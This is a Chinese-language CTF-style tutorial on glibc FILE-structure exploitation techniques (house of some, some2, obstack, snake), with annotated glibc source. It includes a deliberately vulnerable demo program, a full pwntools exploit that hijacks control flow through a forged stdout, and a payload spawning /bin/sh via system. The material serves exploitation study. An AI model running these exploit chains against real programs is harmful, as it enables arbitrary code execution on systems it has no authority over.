_IO_wfile_sync

  • 调用链
  1. _IO_wfile_sync
    wint_t
    _IO_wfile_sync (FILE *fp)
    {
    ssize_t delta;
    wint_t retval = 0;

    /* char* ptr = cur_ptr(); */
    // 不要进入这个分支
    if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base)
    if (_IO_do_flush (fp))
    return WEOF;
    delta = fp->_wide_data->_IO_read_ptr - fp->_wide_data->_IO_read_end;
    // 需要进入到这个分支
    if (delta != 0)
    {
    /* We have to find out how many bytes we have to go back in the
    external buffer. */
    struct _IO_codecvt *cv = fp->_codecvt;
    off64_t new_pos;

    // 这里直接返回-1即可
    int clen = __libio_codecvt_encoding (cv);

    if (clen > 0)
    /* It is easy, a fixed number of input bytes are used for each
    wide character. */
    delta *= clen;
    else
    {
    /* We have to find out the hard way how much to back off.
    To do this we determine how much input we needed to
    generate the wide characters up to the current reading
    position. */
    int nread;
    size_t wnread = (fp->_wide_data->_IO_read_ptr
    - fp->_wide_data->_IO_read_base);
    fp->_wide_data->_IO_state = fp->_wide_data->_IO_last_state;
    // 调用到这里
    nread = __libio_codecvt_length (cv, &fp->_wide_data->_IO_state,
    fp->_IO_read_base,
    fp->_IO_read_end, wnread);
    // ......

    }
    }
    }
    满足条件:
  • fp->_wide_data->_IO_write_ptr <= fp->_wide_data->_IO_write_base
  • fp->_wide_data->_IO_read_ptr - fp->_wide_data->_IO_read_end != 0
  • clen <= 0
    int
    __libio_codecvt_encoding (struct _IO_codecvt *codecvt)
    {
    /* See whether the encoding is stateful. */
    if (codecvt->__cd_in.step->__stateful)
    return -1;
    /* Fortunately not. Now determine the input bytes for the conversion
    necessary for each wide character. */
    if (codecvt->__cd_in.step->__min_needed_from
    != codecvt->__cd_in.step->__max_needed_from)
    /* Not a constant value. */
    return 0;

    return codecvt->__cd_in.step->__min_needed_from;
    }
  • fp->codecvt->__cd_in.step->__stateful != 0
  1. __libio_codecvt_length

  2. DL_CALL_FCT

  3. `gs = fp->_codecvt->__cd_out.step

  4. *(gs->__fct)(gs)

综上所述: * _flags设置为~(4 | 0x10) * vtable设置为_IO_wfile_jumps地址(加减偏移),使其能成功调用_IO_wfile_sync即可 * _wide_data设置为堆地址,假设地址为A,即满足*(fp + 0xa0) = A * _wide_data->_IO_write_ptr <= _wide_data->_IO_write_base,即满足*(A + 0x20) <= *(A + 0x18) * _wide_data->_IO_read_ptr != _wide_data->_IO_read_end,即满足*A != *(A + 8) * _codecvt设置为可控堆地址B,即满足*(fp + 0x98) = B * codecvt->__cd_in.step设置为可控堆地址C,即满足*B = C * codecvt->__cd_in.step->__stateful设置为非0,即满足*(B + 0x58) != 0 * codecvt->__cd_in.step->__shlib_handle设置为0,即满足*C = 0 * codecvt->__cd_in.step->__fct设置为地址D,地址D用于控制rip,即满足*(C + 0x28) = D。当调用到D的时候,此时的rdiC,如果rsi&codecvt->__cd_in.step_data可控

house of some(house of apple2 plus)

  • 利用条件
    1. 已知glibc基地址
    2. 可控的已知地址(可写入内容构造fake_IO_file
    3. 需要一次libc内任意地址写可控地址
    4. 程序能正常退出或者通过exit()退出
  • 优点:
    1. 无视目前的IO_validate_vtable检查(wide_datavtable加上检查也可以打)
    2. 第一次任意地址写要求低
    3. 最后攻击提权是栈上ROP,可以不需要栈迁移
    4. 源码级攻击,不依赖编译结果

利用_IO_new_file_underflow这个函数

int  
_IO_new_file_underflow (FILE *fp)
{
ssize_t count;

/* C99 requires EOF to be "sticky". */
if (fp->_flags & _IO_EOF_SEEN)
return EOF;

if (fp->_flags & _IO_NO_READS)
{
fp->_flags |= _IO_ERR_SEEN;
__set_errno (EBADF);
return EOF;
}
if (fp->_IO_read_ptr < fp->_IO_read_end)
return *(unsigned char *) fp->_IO_read_ptr;

if (fp->_IO_buf_base == NULL)
{
/* Maybe we already have a push back pointer. */
if (fp->_IO_save_base != NULL)
{
free (fp->_IO_save_base);
fp->_flags &= ~_IO_IN_BACKUP;
}
_IO_doallocbuf (fp);
}

/* FIXME This can/should be moved to genops ?? */
if (fp->_flags & (_IO_LINE_BUF|_IO_UNBUFFERED))
{
/* We used to flush all line-buffered stream. This really isn't
required by any standard. My recollection is that
traditional Unix systems did this for stdout. stderr better
not be line buffered. So we do just that here
explicitly. --drepper */
_IO_acquire_lock (stdout);

if ((stdout->_flags & (_IO_LINKED | _IO_NO_WRITES | _IO_LINE_BUF))
== (_IO_LINKED | _IO_LINE_BUF))
_IO_OVERFLOW (stdout, EOF);

_IO_release_lock (stdout);
}

_IO_switch_to_get_mode (fp);

/* This is very tricky. We have to adjust those
pointers before we call _IO_SYSREAD () since
we may longjump () out while waiting for
input. Those pointers may be screwed up. H.J. */
fp->_IO_read_base = fp->_IO_read_ptr = fp->_IO_buf_base;
fp->_IO_read_end = fp->_IO_buf_base;
fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_write_end
= fp->_IO_buf_base;

count = _IO_SYSREAD (fp, fp->_IO_buf_base,
fp->_IO_buf_end - fp->_IO_buf_base);
if (count <= 0)
{
if (count == 0)
fp->_flags |= _IO_EOF_SEEN;
else
fp->_flags |= _IO_ERR_SEEN, count = 0;
}
fp->_IO_read_end += count;
if (count == 0)
{
/* If a stream is read to EOF, the calling application may switch active
handles. As a result, our offset cache would no longer be valid, so
unset it. */
fp->_offset = _IO_pos_BAD;
return EOF;
}
if (fp->_offset != _IO_pos_BAD)
_IO_pos_adjust (fp->_offset, count);
return *(unsigned char *) fp->_IO_read_ptr;
}
会调用_IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base)宏其对应的常规read函数如下
ssize_t  
_IO_file_read (FILE *fp, void *buf, ssize_t size)
{
return (__builtin_expect (fp->_flags2 & _IO_FLAGS2_NOTCANCEL, 0)
? __read_nocancel (fp->_fileno, buf, size)
: __read (fp->_fileno, buf, size));
}
read的三个参数都是可控的 - fd=>fp->_fileno - buf=>fp->_IO_buf_base - size=>fp->_IO_buf_end - fp->_IO_buf_base

其中的for循环我们可以看到对于_IO_list_all上的单向链表,通过了_chain串起来,并在_IO_flush_all中,会遍历链表上每一个FILE,如果条件成立,就可以调用_IO_OVERFLOW(fp, EOF)

由于_IO_new_file_underflow内有一个_IO_switch_to_get_mode函数其中有这个分支

if (fp->_IO_write_ptr > fp->_IO_write_base)  
if (_IO_OVERFLOW (fp, EOF) == EOF)
return EOF;
如果还是使用fp->_IO_write_ptr > fp->_IO_write_base来使得触发OVERFLOW就会出现无限递归,所以不可行,我们需要采取另一个分支,即
if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base) // 不可行  
|| (_IO_vtable_offset (fp) == 0 // 使用||之后的分支
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
实现任意地址读的条件 - _flags设置为~(2 | 0x8 | 0x800),设置为0即可(与apple2相同) - vtable设置为_IO_wfile_jumps/_IO_wfile_jumps_mmap地址,使得调用_IO_wfile_overflow即可(注意此处与apple2不同的是,此处的vtable不能加偏移,否则会打乱_IO_SYSREAD的调用) - _wide_data->_IO_write_base设置为0,即满足*(_wide_data + 0x18) = 0(与apple2相同) - _wide_data->_IO_write_ptr设置为大于_wide_data->_IO_write_base,即满足*(_wide_data + 0x20) > *(_wide_data + 0x18)(注意此处不同) - _wide_data->_IO_buf_base设置为0,即满足*(_wide_data + 0x30) = 0(与apple2相同) - _wide_data->_wide_vtable设置为任意一个包含_IO_new_file_underflow,其中原生的vtable就有,设置成_IO_file_jumps-0x48即可 - _vtable_offset设置为0 - _IO_buf_base_IO_buf_end设置为你需要写入的地址范围 - _chain设置为你下一个触发的fake file地址 - _IO_write_ptr <= _IO_write_base即可 - _fileno设置为0,表示read(0, buf, size) - _mode设置为2,满足fp->_mode > 0即可

任意地址写

fake_file_read = flat({  
0x00: 0, # _flags
0x20: 0, # _IO_write_base
0x28: 0, # _IO_write_ptr

0x38: 任意地址写的起始地址, # _IO_buf_base
0x40: 任意地址写的终止地址, # _IO_buf_end

0x70: 0, # _fileno
0x82: b"\x00", # _vtable_offset
0xc0: 2, # _mode
0xa0: wide_data的地址, # _wide_data
0x68: 下一个调用的fake file地址, # _chain
0xd8: _IO_wfile_jumps, # vtable
}, filler=b"\x00")

fake_wide_data = flat({
0xe0: _IO_file_jumps - 0x48,
0x18: 0,
0x20: 1,
0x30: 0,
}, filler=b"\x00")
任意地址读
fake_file_write = flat({  
0x00: 0x800 | 0x1000, # _flags

0x20: 需要泄露的起始地址, # _IO_write_base
0x28: 需要泄露的终止地址, # _IO_write_ptr

0x70: 1, # _fileno
0x68: 下一个调用的fake file地址, # _chain
0xd8: _IO_file_jumps, # vtable
}, filler=b"\x00")

攻击流程

  • 第一步:任意地址写_chain,这里可以写_IO_list_all或者stdin、stdout、stderr_chain位置,在这一步需要在可控地址上布置一个任意地址写的fake_IO_file,之后将fake_IO_file地址写入上述位置
  • 第二步:扩展fake_IO_file链条并泄露栈地址,在第一步的中,我们只有一个fake_IO_file,并不能完成更复杂的操作,所以这一步我们需要写入两个fake_IO_file,一个用于泄露environ内的值(即栈地址),另一个用于写入下一个fake_IO_file
  • 第三步:泄露栈内数据,并寻找ROP起始地址,这一步同样需要写入两个fake_IO_file,一个任意地址读,读取栈上内存,另一个任意地址写,向栈上写ROP
  • 第四步:写入ROP,实现栈上ROP攻击! [[./houseofsome1.png]]

house of some2

主要关注的函数是_IO_wfile_jumps_maybe_mmap中的_IO_wfile_underflow_maybe_mmap

利用条件为 1. 已知libc地址 2. 可控地址(可写入fake file) 3. 可控stdout指针或者_IO_2_1_stdout_结构体 4. 程序具有printf或者puts输出函数

优点如下 1. 与House of Some一样可以绕过目前的vtable检查 2. printfputs比较普遍,适用性广 3. 可以在栈上劫持控制流,衔接House of Some,完成最后攻击

先关注_IO_wfile_underflow_maybe_mmap函数

wint_t  
_IO_wfile_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Doing the underflow will choose mmap
or vanilla operations and then punt to the chosen underflow routine.
Then we can punt to ours. */
if (_IO_file_underflow_maybe_mmap (fp) == EOF)
return WEOF;

return _IO_WUNDERFLOW (fp);
}
最后调用了_wide_data内的虚表_IO_WUNDERFLOW 那么继续深入_IO_file_underflow_maybe_mmap函数
int  
_IO_file_underflow_maybe_mmap (FILE *fp)
{
/* This is the first read attempt. Choose mmap or vanilla operations
and then punt to the chosen underflow routine. */
decide_maybe_mmap (fp);
return _IO_UNDERFLOW (fp);
}
最后调用了FILE的虚表_IO_UNDERFLOW 继续深入decide_maybe_mmap函数
static void  
decide_maybe_mmap (FILE *fp)
{
/* We use the file in read-only mode. This could mean we can
mmap the file and use it without any copying. But not all
file descriptors are for mmap-able objects and on 32-bit
machines we don't want to map files which are too large since
this would require too much virtual memory. */
struct __stat64_t64 st;

if (_IO_SYSSTAT (fp, &st) == 0
&& S_ISREG (st.st_mode) && st.st_size != 0
/* Limit the file size to 1MB for 32-bit machines. */
&& (sizeof (ptrdiff_t) > 4 || st.st_size < 1*1024*1024)
/* Sanity check. */
&& (fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size))
{
/* Try to map the file. */
void *p;
... 这里主要就是做了mmap
}

/* We couldn't use mmap, so revert to the vanilla file operations. */

if (fp->_mode <= 0)
_IO_JUMPS_FILE_plus (fp) = &_IO_file_jumps;
else
_IO_JUMPS_FILE_plus (fp) = &_IO_wfile_jumps;
fp->_wide_data->_wide_vtable = &_IO_wfile_jumps;
}
有一个关键的_IO_SYSSTAT调用,以及,在这个函数最后会恢复FILE和_wide_data的虚表

整理一下可以知道,如果一个FILE进入了函数_IO_wfile_underflow_maybe_mmap,那么他将会运行如下的流程 1. _IO_SYSSTAT(fp, &st)调用虚表,传入栈指针 2. decide_maybe_mmap函数结束,恢复两个虚表 3. _IO_UNDERFLOW (fp)调用虚表 4. _IO_WUNDERFLOW (fp)调用虚表

_IO_file_jumps虚表的_IO_UNDERFLOW 函数中

count = _IO_SYSREAD (fp, fp->_IO_buf_base,  
fp->_IO_buf_end - fp->_IO_buf_base);
这一步,三个参数都可控,也就是可以写入任意地址

printfputs函数中,最后会调用stdout__xsputn虚表的入口 如果我们使得__xsputn的偏移直接指向__underflow呢? 那么就会得到如下的偏移

__xsputn -> __underflow  
__stat -> __write
此时,修改stdout的虚表为_IO_wfile_jumps_maybe_mmap-0x18

在上述调用过程中_IO_SYSSTAT(fp, &st)这个函数就会变成write(fp, &st, ??) 如果我们能够控制rdx就好了,这里就能做到栈数据泄露

能够控制的也就只有后续调用的_IO_UNDERFLOW (fp)中的_IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base);可以控制,由于decide_maybe_mmap会强制恢复虚表,所以这里我们不用担心篡改虚表带来的影响

如果rdx不可控直接执行write(fp, &st, ??)会怎么样,返回0或者非0 那么回到decide_maybe_mmap

这里判断,如果_IO_SYSSTAT (fp, &st)返回0,那么直接就不会进入if,如果返回不为0,我们看看S_ISREG的定义

#define	__S_ISTYPE(mode, mask)	(((mode) & __S_IFMT) == (mask))  
#define S_ISREG(mode) __S_ISTYPE((mode), __S_IFREG)

这里可以看到最后判断采用的是==判断,由于栈上数据的限制,这里通过判断的概率不高

以及还有st.st_size != 0判断,在没有正确执行stat逻辑,栈维持原貌的情况下,这个if通过概率不高

如果还高,可以控制fp->_offset == _IO_pos_BAD || fp->_offset <= st.st_size为假即可

那么就能顺利的执行完decide_maybe_mmap,并且保留伪造的fp内容没有任何变动

接下来就是调用_IO_file_jumps虚表的_IO_UNDERFLOW ,操作执行read

这里,我们可以设置,注意fake_file_start就是我们当前控制的fp地址

_IO_buf_base = fake_file_start  
_IO_buf_end = fake_file_start + 0x1c8 // 这里的1c8包括了widedata的长度

那么,这里我们就能再次重新复写fake,并扩大可控长度,widedata都可控了

回到上面执行流程,接下来就会执行_IO_WUNDERFLOW (fp)这个虚表函数了

然而,上述我们通过underflow重新控制了fp,也就是接下来的这个虚表函数,我们也是可控的

这里我们控制为_IO_WUNDERFLOW(fp) -> _IO_wfile_underflow_maybe_mmap

我们再次回到了起点,但是这次不一样了 在上一个小节,其实我们已经控制了rdx,因为_IO_SYSREAD (fp, fp->_IO_buf_base,fp->_IO_buf_end - fp->_IO_buf_base)的第三个参数rdx = fp->_IO_buf_end - fp->_IO_buf_base

此时,此时我们依然有这四个执行流程 1. _IO_SYSSTAT(fp, &st)调用虚表,传入栈指针 2. decide_maybe_mmap函数结束,恢复两个虚表 3. _IO_UNDERFLOW (fp)调用虚表 4. _IO_WUNDERFLOW (fp)调用虚表

不同的是,此时_IO_SYSSTAT(fp, &st)可以被指向任意的虚表函数,因为在第二次控制fp的时候,我们又一次覆写了FILEvtable

那么此时我们就可以控制 _IO_SYSSTAT(fp, &st) -> _IO_new_file_read(fp, &st, rdx) 我们已经成功完成了栈溢出

很不幸,decide_maybe_mmap函数开启了canary,我们没办法在没有泄露栈的情况下,完成栈溢出

由于fileno的设置,无法完成write(1,stack,rdx)的操作,真的没有办法的了吗

那么接下来,有请_IO_default_xsputn_IO_default_xsgetn

我们阅读这两个函数源码

size_t  
_IO_default_xsgetn (FILE *fp, void *data, size_t n)
{
size_t more = n;
char *s = (char*) data;
for (;;)
{
/* Data available. */
if (fp->_IO_read_ptr < fp->_IO_read_end)
{
size_t count = fp->_IO_read_end - fp->_IO_read_ptr;
if (count > more)
count = more;
if (count > 20)
{
s = __mempcpy (s, fp->_IO_read_ptr, count);
fp->_IO_read_ptr += count;
}
else if (count)
{
char *p = fp->_IO_read_ptr;
int i = (int) count;
while (--i >= 0)
*s++ = *p++;
fp->_IO_read_ptr = p;
}
more -= count;
}
if (more == 0 || __underflow (fp) == EOF)
break;
}
return n - more;
}


size_t
_IO_default_xsputn (FILE *f, const void *data, size_t n)
{
const char *s = (char *) data;
size_t more = n;
if (more <= 0)
return 0;
for (;;)
{
/* Space available. */
if (f->_IO_write_ptr < f->_IO_write_end)
{
size_t count = f->_IO_write_end - f->_IO_write_ptr;
if (count > more)
count = more;
if (count > 20)
{
f->_IO_write_ptr = __mempcpy (f->_IO_write_ptr, s, count);
s += count;
}
else if (count)
{
char *p = f->_IO_write_ptr;
ssize_t i;
for (i = count; --i >= 0; )
*p++ = *s++;
f->_IO_write_ptr = p;
}
more -= count;
}
if (more == 0 || _IO_OVERFLOW (f, (unsigned char) *s++) == EOF)
break;
more--;
}
return n - more;
}

可以知道,这是对于fp内的缓冲区的操作,可以关注到的是这里函数内有两个关键的部分

_IO_default_xsgetn (FILE *fp, void *data, size_t n)   
==> __mempcpy(data, fp->_IO_read_ptr, n);
_IO_default_xsputn (FILE *f, const void *data, size_t n)
==> __mempcpy (f->_IO_write_ptr, data, n);
如果能够保证
fp->_IO_read_end - fp->_IO_read_ptr == n  
f->_IO_write_end - f->_IO_write_ptr == n
就不会进入__underflow_IO_OVERFLOW降低其他函数的干扰

这个时候就能衍生出一个大胆的想法,如果我们先将栈复制一份到可控的区域,再通过偏移写入,最后再拷贝回到栈内,那么我们就能完美的绕过canary并且,并不需要泄露canary

[[./houseofsome2.png]]

demo.c

// gcc demo.c -o demo  
#include<stdio.h>

int main(){
setbuf(stdin, 0);
setbuf(stdout, 0);
setbuf(stderr, 0);
int c;
printf("[+] printf: %p\n", &printf);
while (1) {
puts(
"1. add heap.\n"
"2. write libc.\n"
"3. exit");
printf("> "
);
scanf("%d", &c);
if(c == 1) {
int size;
printf("size> ");
scanf("%d", &size);
char *p = malloc(size);
printf("[+] done %p\n", p);
printf("content> ");
read(0, p, size);
} else if(c == 2){
size_t addr, size;
printf("size> ");
scanf("%lld", &size);
printf("addr> ");
scanf("%lld", &addr);
printf("content> ");
read(0, (char*)addr, size);
} else {
break;
}
}
}

exp

from pwn import *  
context.log_level = 'debug'
context.arch = 'amd64'

tob = lambda x: str(x).encode()
io = process("./demo")

io.recvuntil(b"[+] printf: ")
printf_addr = int(io.recvuntil(b"\n", drop=True), 16)
log.success(f"printf_addr: {printf_addr:#x}")

def add(size):
io.sendlineafter(b"> ", b"1")
io.sendlineafter(b"size> ", tob(size))

def write(addr, size, content):
io.sendlineafter(b"> ", b"2")
io.sendlineafter(b"size> ", tob(size))
io.sendlineafter(b"addr> ", tob(addr))
io.sendafter(b"content> ", content)

def leave():
io.sendlineafter(b"> ", b"3")

libc = ELF("./libc.so.6", checksec=False)
libc_base = printf_addr - libc.symbols["printf"]
libc.address = libc_base
log.success(f"libc_base: {libc_base:#x}")

_IO_wfile_jumps_maybe_mmap = libc.address + 0x215f40
log.success(f"_IO_wfile_jumps_maybe_mmap: {_IO_wfile_jumps_maybe_mmap:#}")
_IO_str_jumps = libc.address + 0x2166c0
log.success(f"_IO_str_jumps: {_IO_str_jumps:#}")
_IO_default_xsputn = _IO_str_jumps + 0x38
_IO_default_xsgetn = _IO_str_jumps + 0x40

# 此处直接修改_IO_2_1_stdout_内容
write(libc.symbols["_IO_2_1_stdout_"], 0xe0, flat({
0x0: 0x8000, # disable lock
0x38: libc.symbols["_IO_2_1_stdout_"], # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0x70: 0, # _fileno
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0x100, # +0xe0可写即可
0xc0: p32(0xffffffff), # _mode < 0
0xd8: _IO_wfile_jumps_maybe_mmap - 0x18,
}, filler=b"\x00"))

# 拷贝栈上数据到可控地址,这里拷贝到_IO_2_1_stdout_的上方,方便下次写入顺便完成fp第三次控制
io.send(flat({
0x8: libc.symbols["_IO_2_1_stdout_"], # 需要可写地址

0x38: libc.symbols["_IO_2_1_stdout_"] - 0x1c8 + 0xc8, # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0xe0,
0xc0: p32(0xffffffff),

0xd8: _IO_default_xsputn - 0x90, # vtable
0x28: libc.symbols["_IO_2_1_stdout_"] - 0x1c8, # _IO_write_ptr
0x30: libc.symbols["_IO_2_1_stdout_"], # _IO_write_end

0xe0: {
0xe0: _IO_wfile_jumps_maybe_mmap
}
}, filler=b"\x00"))

# 最后这里就可以劫持执行流到0xdeadbeaf了
io.send(flat({
0: 0xdeadbeaf, # retn
0x1c8-0xc8: {
0x38: libc.symbols["_IO_2_1_stdout_"] - 0x1c8 + 0xc8, # _IO_buf_base
0x40: libc.symbols["_IO_2_1_stdout_"] + 0x1c8, # _IO_buf_end
0xa0: libc.symbols["_IO_2_1_stdout_"] + 0xe0,
0xc0: p32(0xffffffff),

0xd8: _IO_default_xsgetn - 0x90, # vtable
0x08: libc.symbols["_IO_2_1_stdout_"] - 0x1c8, # _IO_read_ptr
0x10: libc.symbols["_IO_2_1_stdout_"] + (0x1c8 - 0xc8), # _IO_read_end

0xe0: {
0xe0: _IO_wfile_jumps_maybe_mmap
}
}
}, filler=b"\x00"))

io.interactive()

house of 琴瑟琵琶 | house of obstack(2.34~2.36)

_IO_obstack_file结构体

struct _IO_obstack_file
{
struct _IO_FILE_plus file;
struct obstack *obstack;
};

struct obstack /* control current object in current chunk */
{
long chunk_size; /* preferred size to allocate chunks in */
struct _obstack_chunk *chunk; /* address of current struct obstack_chunk */
char *object_base; /* address of object we are building */
char *next_free; /* where to add next char to current object */
char *chunk_limit; /* address of char after current chunk */
union
{
PTR_INT_TYPE tempint;
void *tempptr;
} temp; /* Temporary for some macros. */
int alignment_mask; /* Mask of alignment for each object. */
/* These prototypes vary based on 'use_extra_arg', and we use
casts to the prototypeless function type in all assignments,
but having prototypes here quiets -Wstrict-prototypes. */
struct _obstack_chunk *(*chunkfun) (void *, long);
void (*freefun) (void *, struct _obstack_chunk *);
void *extra_arg; /* first arg for chunk alloc/dealloc funcs */
unsigned use_extra_arg : 1; /* chunk alloc/dealloc funcs take extra arg */
unsigned maybe_empty_object : 1; /* There is a possibility that the current
chunk contains a zero-length object. This
prevents freeing the chunk if we allocate
a bigger chunk to replace it. */
unsigned alloc_failed : 1; /* No longer used, as we now call the failed
handler on error, but retained for binary
compatibility. */
};

_IO_obstack_overflow

  • 调用链
  1. _IO_obstack_overflow

    static int _IO_obstack_overflow (FILE *fp, int c)
    {
    struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;
    int size;

    /* Make room for another character. This might as well allocate a
    new chunk a memory and moves the old contents over. */
    assert (c != EOF); // 此处不可控
    obstack_1grow (obstack, c);

    /* Setup the buffer pointers again. */
    fp->_IO_write_base = obstack_base (obstack);
    fp->_IO_write_ptr = obstack_next_free (obstack);
    size = obstack_room (obstack);
    fp->_IO_write_end = fp->_IO_write_ptr + size;
    /* Now allocate the rest of the current chunk. */
    obstack_blank_fast (obstack, size);

    return c;
    }

  2. obstack_1grow (obstack, c)

  3. _obstack_newchunk (__o, 1)

  4. new_chunk = CALL_CHUNKFUN (h, new_size)

  5. (*(h)->chunkfun)((h)->extra_arg, (size))

_IO_obstack_xsputn(优先选择)

  • 调用链
  1. _IO_obstack_xsputn

    static size_t _IO_obstack_xsputn (FILE *fp, const void *data, size_t n)
    {
    struct obstack *obstack = ((struct _IO_obstack_file *) fp)->obstack;

    if (fp->_IO_write_ptr + n > fp->_IO_write_end)
    {
    int size;

    /* We need some more memory. First shrink the buffer to the
    space we really currently need. */
    obstack_blank_fast (obstack, fp->_IO_write_ptr - fp->_IO_write_end);

    /* Now grow for N bytes, and put the data there. */
    obstack_grow (obstack, data, n); //执行此函数

    /* Setup the buffer pointers again. */
    fp->_IO_write_base = obstack_base (obstack);
    fp->_IO_write_ptr = obstack_next_free (obstack);
    size = obstack_room (obstack);
    fp->_IO_write_end = fp->_IO_write_ptr + size;
    /* Now allocate the rest of the current chunk. */
    obstack_blank_fast (obstack, size);
    }
    else
    fp->_IO_write_ptr = __mempcpy (fp->_IO_write_ptr, data, n);

    return n;
    }

  2. obstack_grow (obstack, data, n)

            obstack_grow(obstack, data, n);
    定义:
    # define obstack_grow(OBSTACK, where, length) \
    __extension__ \
    ({ struct obstack *__o = (OBSTACK); \
    int __len = (length); \
    if (__o->next_free + __len > __o->chunk_limit) \
    _obstack_newchunk (__o, __len); \
    memcpy (__o->next_free, where, __len); \
    __o->next_free += __len; \
    (void) 0; })
    替换:
    ({
    struct obstack *__o = (obstack);
    int __len = (n);
    if (__o->next_free + __len > __o->chunk_limit)_obstack_newchunk(__o, __len);
    memcpy(__o->next_free, data, __len);
    __o->next_free += __len;
    (void) 0;
    });

  3. _obstack_newchunk (__o, __len)

    void _obstack_newchunk(struct obstack *h, int length) {
    struct _obstack_chunk *old_chunk = h->chunk;
    struct _obstack_chunk *new_chunk;
    long new_size;
    long obj_size = h->next_free - h->object_base;
    long i;
    long already;
    char *object_base;

    /* Compute size for new chunk. */
    new_size = (obj_size + length) + (obj_size >> 3) + h->alignment_mask + 100;
    if (new_size < h->chunk_size)
    new_size = h->chunk_size;

    /* Allocate and initialize the new chunk. */
    new_chunk = CALL_CHUNKFUN(h, new_size); // 调用函数位置
    ...
    }

  4. new_chunk = CALL_CHUNKFUN (h, new_size)

    new_chunk = CALL_CHUNKFUN(h, new_size);
    定义:
    #define CALL_CHUNKFUN(h, size) \
    (((h)->use_extra_arg) \
    ? (*(h)->chunkfun)((h)->extra_arg, (size)) \
    : (*(struct _obstack_chunk * (*) (long) )(h)->chunkfun)((size)))
    替换:
    (((h)->use_extra_arg) ? (*(h)->chunkfun)((h)->extra_arg, (new_size)) : (*(struct _obstack_chunk *(*) (long) )(h)->chunkfun)((new_size)))
    第一个参数可控,同时需要保证(((h)->use_extra_arg)1

  5. (*(h)->chunkfun)((h)->extra_arg, (size))

[[./houseofobstack1.png]]

exp如下

fake_io_addr = heap_addr + 0x1390
obstack_ptr = fake_io_addr + 0x30
fake_io_file = b''
fake_io_file = fake_io_file.ljust(0x58,b'\x00')
fake_io_file += p64(system_addr) # 需要执行的函数
fake_io_file += p64(0)
fake_io_file += p64(fake_io_addr+0xe8) # 执行函数的 rdi
fake_io_file += p64(1) # obstack->use_extra_arg=1
fake_io_file += p64(heap_addr+0x2000) # _IO_lock_t *_lock;
fake_io_file = fake_io_file.ljust(0xc8,b'\x00')
fake_io_file += p64(IO_obstack_jumps_addr + 0x20) # 触发 _IO_obstack_xsputn;
fake_io_file += p64(obstack_ptr) # struct obstack *obstack
print(hex(len(fake_io_file))) # 因为是largebin attack 所以: 0xd8=0xe8-0x10
# pause()

# 执行函数的 rdi 的地址所存储的内容
payload = fake_io_file+ b'/bin/sh\x00'

house of snake(house of obstack plus)

libc-2.37后由house of obstack转换为house of snake 删除了 _IO_obstack_jumps 但是添加了 _IO_printf_buffer_as_file_jumps 这个新的 _IO_jumps_t 结构体

static const struct _IO_jump_t _IO_printf_buffer_as_file_jumps libio_vtable =
{
JUMP_INIT_DUMMY,
JUMP_INIT(finish, NULL),
JUMP_INIT(overflow, __printf_buffer_as_file_overflow),
JUMP_INIT(underflow, NULL),
JUMP_INIT(uflow, NULL),
JUMP_INIT(pbackfail, NULL),
JUMP_INIT(xsputn, __printf_buffer_as_file_xsputn),
JUMP_INIT(xsgetn, NULL),
JUMP_INIT(seekoff, NULL),
JUMP_INIT(seekpos, NULL),
JUMP_INIT(setbuf, NULL),
JUMP_INIT(sync, NULL),
JUMP_INIT(doallocate, NULL),
JUMP_INIT(read, NULL),
JUMP_INIT(write, NULL),
JUMP_INIT(seek, NULL),
JUMP_INIT(close, NULL),
JUMP_INIT(stat, NULL),
JUMP_INIT(showmanyc, NULL),
JUMP_INIT(imbue, NULL)
};
其中__printf_buffer_as_file_overflow 函数定义如下:
static inline bool __attribute_warn_unused_result__
__printf_buffer_has_failed(struct __printf_buffer *buf) {
return buf->mode == __printf_buffer_mode_failed;
}

static int
__printf_buffer_as_file_overflow(FILE *fp, int ch) {
struct __printf_buffer_as_file *file = (struct __printf_buffer_as_file *) fp;

__printf_buffer_as_file_commit(file);

/* EOF means only a flush is requested. */
if (ch != EOF)
__printf_buffer_putc(file->next, ch);

/* Ensure that flushing actually produces room. */
if (!__printf_buffer_has_failed(file->next)
&& file->next->write_ptr == file->next->write_end)
__printf_buffer_flush(file->next);

...
}
首先 __printf_buffer_as_file_overflow 函数将 FILE 结构体转换为 __printf_buffer_as_file 类型,相关定义如下:
struct __printf_buffer
{
char *write_base;
char *write_ptr;
char *write_end;
uint64_t written;
enum __printf_buffer_mode mode;
};

struct __printf_buffer_as_file
{
/* Interface to libio. */
FILE stream;
const struct _IO_jump_t *vtable;

/* Pointer to the underlying buffer. */
struct __printf_buffer *next;
};
之后调用了 __printf_buffer_as_file_commit ,该函数做了一些检查:
static void
__printf_buffer_as_file_commit (struct __printf_buffer_as_file *file)
{
/* Check that the write pointers in the file stream are consistent
with the next buffer. */
assert (file->stream._IO_write_ptr >= file->next->write_ptr);
assert (file->stream._IO_write_ptr <= file->next->write_end);
assert (file->stream._IO_write_base == file->next->write_base);
assert (file->stream._IO_write_end == file->next->write_end);

file->next->write_ptr = file->stream._IO_write_ptr;
}
之后根据参数ch是否为EOF决定是否调用 __printf_buffer_putcFSOP中调用的_IO_flush_all_lockp函数中是通过_IO_OVERFLOW (fp, EOF)调用到vtable中的overflow函数,因此__printf_buffer_as_file_overflow的参数chEOF, 当然,即使调用到了__printf_buffer_putc也只是是做了一些指针记录的数值加减的操作,对此我们不用过多关注

再之后会调用__printf_buffer_flush函数,调用条件是file->next.mode != __printf_buffer_mode_failedfile->next->write_ptr == file->next->write_end

__printf_buffer_flush函数定义如下,这里再次检查file->next.mode != __printf_buffer_mode_failed然后调用__printf_buffer_do_flush函数,参数为file->next

#define Xprintf(n) __printf_##n
